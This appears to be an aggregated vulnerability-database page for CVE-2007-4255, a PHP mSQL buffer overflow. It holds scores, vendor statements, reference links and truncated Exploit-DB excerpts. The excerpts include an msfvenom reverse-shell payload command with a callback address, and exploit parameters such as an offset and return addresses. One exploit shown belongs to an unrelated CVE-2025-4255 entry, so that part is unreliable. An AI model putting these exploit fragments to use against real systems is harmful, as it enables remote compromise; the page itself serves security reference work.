CVE-2007-4255
Published: 2007-08-08
Priority P339 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 9.33% (94.8th percentile)
Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msql_connect function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
CVSS provenance
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 7.5 · HIGH
Red Hat
CVE-2007-4255: Buffer overflow in the mSQL extension in PHP 5
vendor_redhat·CVSS 7.5
CVE-2007-4255 [HIGH] CVE-2007-4255: Buffer overflow in the mSQL extension in PHP 5
Statement: Not vulnerable. PHP packages as shipped with Red Hat Enterprise Linux versions 2.1, 3, 4, and 5 are not compiled with msql library and are not vulnerable to this issue.
GHSA
GHSA-vp44-326x-5c5g: Buffer overflow in the mSQL extension in PHP 5
ghsa_unreviewed·2022-05-01
CVE-2007-4255 [HIGH] GHSA-vp44-326x-5c5g: Buffer overflow in the mSQL extension in PHP 5
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
Exploit-DB
PHP mSQL (msql_connect) - Local Buffer Overflow
exploitdb·2007-08-08
CVE-2007-4255 PHP mSQL (msql_connect) - Local Buffer Overflow
---
*/
if (!function_exists('msql_connect')) {
    die('mSQL extension is not available');
}
$ret = "\xA3\x3D\x92\x7C"; #shell32.dll ->CALL EBP WindowsXP
$shellcode=
Exploit-DB
PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)
exploitdb·2007-08-06
CVE-2007-4255 PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)
---
42424242
?>
# milw0rm.com [2007-08-06]
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/475660/100/0/threaded
http://www.securityfocus.com/bid/25213
https://exchange.xforce.ibmcloud.com/vulnerabilities/35830
https://www.exploit-db.com/exploits/4260